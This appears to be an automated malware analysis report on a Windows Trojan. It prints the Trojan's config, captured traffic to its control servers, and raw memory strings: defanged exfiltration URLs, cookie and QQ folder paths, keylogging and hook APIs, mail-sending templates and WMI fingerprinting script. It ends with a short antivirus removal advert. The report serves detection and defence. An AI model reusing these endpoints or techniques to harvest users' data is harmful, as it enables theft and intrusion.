[F4][F5]/WEB/D_ym_Jk/[F5][F6]1[F6][F7]1[F7][F8]5[F8][s20]C:\Windows\Sy
stem\get_local_datum.txt[s20][dlyc]40000[dlyc][fzbyc]30000[fzbyc][jcmc
]AAA...............[jcmc][sypost]3[sypost][xmlHttp_GetInfo]1[xmlHttp_G
etInfo][xmlHttp_AddCode]1[xmlHttp_AddCode][GetFried]73[GetFried][upHel
p]69[upHelp][back_url]hXXp://1.aaaverify.sinaapp.com/back.txt[back_url
][skype_url]hXXp://VVV.aaazha.com/page/study/skype.html[skype_url][adm
in_url]hXXp://VVV.baidu.com[admin_url][s21]54,32,02,ED,D5,B5,3C,E8,30,
84,76,C2,5E,F4,02,16,35,87,15,E6,B7,D6,CE,[s21][s22]hXXp://cgi.im.qq.c
om/cgi-bin/cgi_svrtime[s22][min]1120[min][max]1500[max][p=obs]A3,A9,[o
bs][p=obp]25,7A,57,[obp][strcd]15[strcd][strbs]gnb*[strbs][getCoot]15[
getCoot][senKet]8*66[senKet][sz166]1500[sz166][sz52k]10000[sz52k][mmd8
8]76.com[mmd88][objokj]baidu.com[objokj][de3]720000[de3][addBase]14[ad
dBase][http-s]image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
<<< skipped >>>


GET /music/url.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: aaafzcloud.duapp.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 27 Jun 2016 17:22:45 GMT
Content-Type: text/plain
Content-Length: 119
Connection: keep-alive
ETag: "1831753481"
Accept-Ranges: bytes
Last-Modified: Fri, 08 Apr 2016 09:52:54 GMT
Set-Cookie: BAEID=C55117C1D377C73FC86310287F6FD72D; expires=Tue, 27-Jun-17 17:22:45 GMT; max-age=31536000; path=/; version=1
*|hXXp://yunshiting.baidu.com/data2/music/6014329382/begin.mp3?xcode=4
4eee67d7da4c0dffcb4a0d00e046e26805971f83b18ba2f|*HTTP/1.1 200 OK..Serv
er: openresty..Date: Mon, 27 Jun 2016 17:22:45 GMT..Content-Type: text
/plain..Content-Length: 119..Connection: keep-alive..ETag: "1831753481
"..Accept-Ranges: bytes..Last-Modified: Fri, 08 Apr 2016 09:52:54 GMT.
.Set-Cookie: BAEID=C55117C1D377C73FC86310287F6FD72D; expires=Tue, 27-J
un-17 17:22:45 GMT; max-age=31536000; path=/; version=1..*|hXXp://yuns
hiting.baidu.com/data2/music/6014329382/begin.mp3?xcode=44eee67d7da4c0
dffcb4a0d00e046e26805971f83b18ba2f|*..



GET /tool/get_date.php HTTP/1.1
Accept: */*
Referer: hXXp://1.musql.sinaapp.com/tool/get_date.php
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Host: 1.musql.sinaapp.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: sae
Date: Mon, 27 Jun 2016 17:22:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Via: 10.67.15.66
13..2016-06-28 01:22:44..HTTP/1.1 200 OK..Server: sae..Date: Mon, 27 J
un 2016 17:22:44 GMT..Content-Type: text/html..Transfer-Encoding: chun
ked..Connection: keep-alive..Via: 10.67.15.66..13..2016-06-28 01:22:44
..0..0..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_464:

.text
`.rdata
@.data
.rsrc
t%SVh
t$(SSh
~%UVW
u$SShe
exdui.dll
gdiplus.dll
kernel32.dll
GdiPlus.dll
Kernel32.dll
user32.dll
Ole32.dll
OleAut32.dll
User32.dll
ole32.dll
shlwapi.dll
advapi32.dll
wininet.dll
advpack.dll
Psapi.dll
ntdll.dll
Wininet.dll
Powrprof.dll
gdi32.dll
Gdi32.dll
shell32.dll
imm32.dll
dbghelp.dll
oleaut32.dll
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ExitWindowsEx
EnumChildWindows
keybd_event
ShellExecuteA
InternetOpenUrlA
GetProcessHeap
SetThreadExecutionState
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
FtpCreateDirectoryA
FtpRemoveDirectoryA
FtpGetFileA
FtpFindFirstFileA
FtpSetCurrentDirectoryA
FtpGetCurrentDirectoryA
FtpDeleteFileA
FtpRenameFileA
FtpPutFileA
FtpOpenFileA
FtpGetFileSize
mg.LJ
AOC:\Windows\System\MemorandumList.txt
aaafz.ini
\aaafz.ini
_en.exe
cmd /c
MsgBox
SysShadow.SubWnd
@1970-01-01 08:00:00
function time(){return Math.random()}
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Content-Type: application/x-www-form-urlencoded
.cxy8sx9
,uy.vj
.z[.Rtp
qiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:d0cdb6d2-3bc3-6746-9351-ff561d33a363" xmpMM:DocumentID="xmp.did:4CC505A0D42511E3B385D3EF3F3439C4" xmpMM:InstanceID="xmp.iid:4CC5059FD42511E3B385D3EF3F3439C4" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:d70b5050-85a9-8744-be83-8775065333d9" stRef:documentID="xmp.did:d0cdb6d2-3bc3-6746-9351-ff561d33a363"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
!iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:28F53F6E299811E3B1A8A019DAF4929E" xmpMM:DocumentID="xmp.did:28F53F6F299811E3B1A8A019DAF4929E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:28F53F6C299811E3B1A8A019DAF4929E" stRef:documentID="xmp.did:28F53F6D299811E3B1A8A019DAF4929E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
"iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:25400547614111E28777F5A2DD1EF067" xmpMM:DocumentID="xmp.did:25400548614111E28777F5A2DD1EF067"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2528F6FB614111E28777F5A2DD1EF067" stRef:documentID="xmp.did:2528F6FC614111E28777F5A2DD1EF067"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>G7<
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:14D7653981EB11E0ABBA8BFCC0EC16F8" xmpMM:DocumentID="xmp.did:14D7653A81EB11E0ABBA8BFCC0EC16F8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:14D7653781EB11E0ABBA8BFCC0EC16F8" stRef:documentID="xmp.did:14D7653881EB11E0ABBA8BFCC0EC16F8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2528F6F9614111E28777F5A2DD1EF067" xmpMM:DocumentID="xmp.did:2528F6FA614111E28777F5A2DD1EF067"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2528F6F7614111E28777F5A2DD1EF067" stRef:documentID="xmp.did:2528F6F8614111E28777F5A2DD1EF067"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
c-V}Sk^
.pNA$ }C
ImageMagick 6.8.8-7 Q16 x86_64 2014-02-28 hXXp://VVV.imagemagick.orgY
1398346191
file:///home/ftp/1520/easyicon.cn/easyicon.cn/cdn-img.easyicon.cn/png/11495/1149545.png
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:D0039692FA2811E097478BF4EB24303B" xmpMM:DocumentID="xmp.did:D0039693FA2811E097478BF4EB24303B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D0039690FA2811E097478BF4EB24303B" stRef:documentID="xmp.did:D0039691FA2811E097478BF4EB24303B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
:15.0.0.0:80
:1.0.0.0:8
hXXp://56063.vhost18.boxcdn.cn/law.txt
hXXp://56063.vhost18.boxcdn.cn/Mess.asp
\host_ip.txt
:*.*.*.*:**
*.txt
|*.txt
application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
\*.txt
https
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
hXXps://
hXXp://
[1][0-9]{10}
hXXp://m.ip138.com/mobile.asp?mobile=
\Tencent\QQ\Misc\*.*
.com/Mail.php
hXXp://1.musql.
hXXp://1.musql.sinaapp.com/
@hXXp://1.musql.sinaapp.com/tool/get_date.php
hXXp://cgi.im.qq.com/cgi-bin/cgi_svrtime
hXXp://aaafzcloud.duapp.com/tool/time.php
hXXp://VVV.l-last.win/t.php
.com/best_house.php
&key=
open_url_lalala_w
[url]
&userKey=
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:2CE3E614217B11E2898D9043977D7DC1" xmpMM:DocumentID="xmp.did:2CE3E615217B11E2898D9043977D7DC1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2CE3E612217B11E2898D9043977D7DC1" stRef:documentID="xmp.did:2CE3E613217B11E2898D9043977D7DC1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>0@z$
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:258BC13A614111E28777F5A2DD1EF067" xmpMM:DocumentID="xmp.did:258BC13B614111E28777F5A2DD1EF067"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:258BC138614111E28777F5A2DD1EF067" stRef:documentID="xmp.did:258BC139614111E28777F5A2DD1EF067"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>*b)
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:6EA14AE681E911E0B2789D4B994B37F9" xmpMM:DocumentID="xmp.did:6EA14AE781E911E0B2789D4B994B37F9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6EA14AE481E911E0B2789D4B994B37F9" stRef:documentID="xmp.did:6EA14AE581E911E0B2789D4B994B37F9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
>i!M.".eH/;
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:9BE2179781E711E09668D7225E659C46" xmpMM:DocumentID="xmp.did:9BE2179881E711E09668D7225E659C46"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9BE2179581E711E09668D7225E659C46" stRef:documentID="xmp.did:9BE2179681E711E09668D7225E659C46"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>=J,6
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:D46FBE26598711E4A2CA966147765F34" xmpMM:DocumentID="xmp.did:D46FBE27598711E4A2CA966147765F34"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D46FBE24598711E4A2CA966147765F34" stRef:documentID="xmp.did:D46FBE25598711E4A2CA966147765F34"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
1Kw%C
hXXp://VVV.baidu.com/s?wd=
hXXp://1.musql.sinaapp.com/UserFriedManager.php
hXXps://VVV.baidu.com/s?wd=
hXXp://1.musql.sinaapp.com/synchronous/synchronous.php
\exdui.dll
C:\Windows\System\exdui.dll
z.vkDL"
Riched20.dll
Microsoft.XMLDOM
number is %d.
:"%s"
%:.NG2r8%4/h
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
cmd /c attrib  s  a  h  r
hXXp://1.applis.sinaapp.com/sendEmail/SendIsNew.php
TStdHttpAnalyzerForm
%WinDir%\
C:\Windows\System\background_image_main.jpg
18,43,43,87,
54,11,24,
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_VideoController")
GetTrait ="1:"&Obj.Caption&" 2:"&Obj.AdapterRAM&" 3:"&Obj.VideoProcessor
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_OperatingSystem")
GetTrait = "[t]"&Obj.InstallDate&"[t][s]"&round(Obj.TotalVisibleMemorySize/1024,0)&"MB[s]"
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:50dc4fba-6817-e24f-b7fd-8947929044c8" xmpMM:DocumentID="xmp.did:0B6A635D806311E4917CAE7368984CC7" xmpMM:InstanceID="xmp.iid:0B6A635C806311E4917CAE7368984CC7" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7f8ae331-3f3c-2d48-a7fa-cd0126f5bbcf" stRef:documentID="adobe:docid:photoshop:6daf356f-76ef-11e4-814e-9f5c87f07241"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>#
[ip_url_s]
.com/
hXXp://1.
115645421
13132132
!**[/]*?
[ipUrl]
[phone_num_url]
[ymzq_url]
hXXp://71809.vhost29.boxcdn.cn/TeaManager.html
hXXp://1.musql.sinaapp.com/tool/sendBug.php
&key_2=
sos=1&key_1=
hXXp://VVV.l-loan.loan
hXXp://VVV.l-last.win/
[xmlHttp_GetInfo]
hXXp://VVV.l-last.win/
[back_url]
[skype_url]
[admin_url]
[xmlHttp_AddCode]
[http-s]
[http-l]
[qiangz_url]
hXXp://aaafzcloud.duapp.com/music/url.txt
hXXp://aaafzcloud.duapp.com
.com/new_par/isonLine.php
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
hXXp://1.musql.sinaapp.com/user_string/add.php
hXXp://1.musql.sinaapp.com/user_string/get.php?u=
%f%%f
7".Fv
>.OsM
r.vDO
\historyRecord.txt
.IDATx
hXXp://1.applis.sinaapp.com/UserHelper/xmlHttp_GetInfo.php
hXXp://1.applis.sinaapp.com/UserHelper/xmlHttp_SetUserInfo.php
http:
%WinDir%\aaafz_begin.bat
hXXp://1.applis.sinaapp.com/UserHelper/xmlHttp_AddCode.php
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:BD8298792DBC11E4BFD6D33E8817C637" xmpMM:DocumentID="xmp.did:BD82987A2DBC11E4BFD6D33E8817C637"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BD8298772DBC11E4BFD6D33E8817C637" stRef:documentID="xmp.did:BD8298782DBC11E4BFD6D33E8817C637"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>"v
hXXp://api.ysdm.net/register.xml
hXXp://api.ysdm.net/info.xml
hXXp://api.ysdm.net/recharge.xml
hXXp://api.ysdm.net/create.xml
hXXp://api.ysdm.net/reporterror.xml
crText
Report
themepassword
SysShadow.HostWnd
dwmapi.dll
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
PasswordChar
crTextSel
SysShadow.Menu
fiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:E597E2D38BB411E28047AFF10AFC4B08" xmpMM:InstanceID="xmp.iid:E597E2D28BB411E28047AFF10AFC4B08" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3CC01EF9A78BE211B65F802E71ED3045" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>_
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:E53162408BB411E28047AFF10AFC4B08" xmpMM:InstanceID="xmp.iid:E531623F8BB411E28047AFF10AFC4B08" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3CC01EF9A78BE211B65F802E71ED3045" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>$GK
&password=
&softkey=
Content-Disposition: form-data; name="password"
{pass}
Content-Disposition: form-data; name="softkey"
{softkey}
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
SetClientCertificate
Login
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
?456789:;<=
!"#$%&'()* ,-./0123
Q%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
RASAPI32.dll
RPCRT4.dll
WinExec
GetWindowsDirectoryA
KERNEL32.dll
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyExA
COMCTL32.dll
WSOCK32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\PhysicalDrive0
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
VVV.dywt.com.cn
;3 #>6.&
'2, / 0&7!4-)1#
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
window %s handle %d
play %s from %d
play %s
status %s position
close %s
Bag pipe
%d%d%d
rundll32.exe shell32.dll,
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
right-curly-bracket
left-curly-bracket
0123456789
The URL has moved <a href="hXXp://VVV.sogou.com/web?eqs=IqBxtK2GXBhObbOJnApGMSVJzHTu5YFkNp0pX4BY7raYoHO4Lmoxg6VkPt+lrAuy0EvntqalRd7p
IIQoVH7sLA==&lkx=0">here</a>
*|hXXp://yunshiting.baidu.com/data2/music/6014329382/begin.mp3?xcode=44eee67d7da4c0dffcb4a0d00e046e26805971f83b18ba2f|*
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
1.0.0.0
(*.*)
7.5.1.0

%original file name%.exe_464_rwx_00E20000_00013000:

.text
`.rdata
@.data
.rsrc
@.reloc
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
<fd:%d>
%c%c%c%c%c%c%c%c%c%c
MSVCRT.dll
KERNEL32.dll
zlib1.dll
!"#$%&'()* ,-./012
DLL support by Alessandro Iacopetti & Gilles Vollant

%original file name%.exe_464_rwx_10001000_0002C000:

f9z.vk
Riched20.dll
Riched32.dll
{00000000-0000-0000-C000-000000000046}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
Microsoft.XMLDOM
z>Advapi32.dll
advapi32.dll
kernel32.dll
ntdll.dll
user32.dll
gdi32.dll
ole32.dll
Ole32.dll
shell32.dll
atl.dll
GdiPlus.dll
GetProcessHeap
program internal error number is %d.
:"%s"
:"%s".
%:.NG2r8%4/h
.text
`.rdata
@.data
.rsrc
.reloc
number is %d.


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

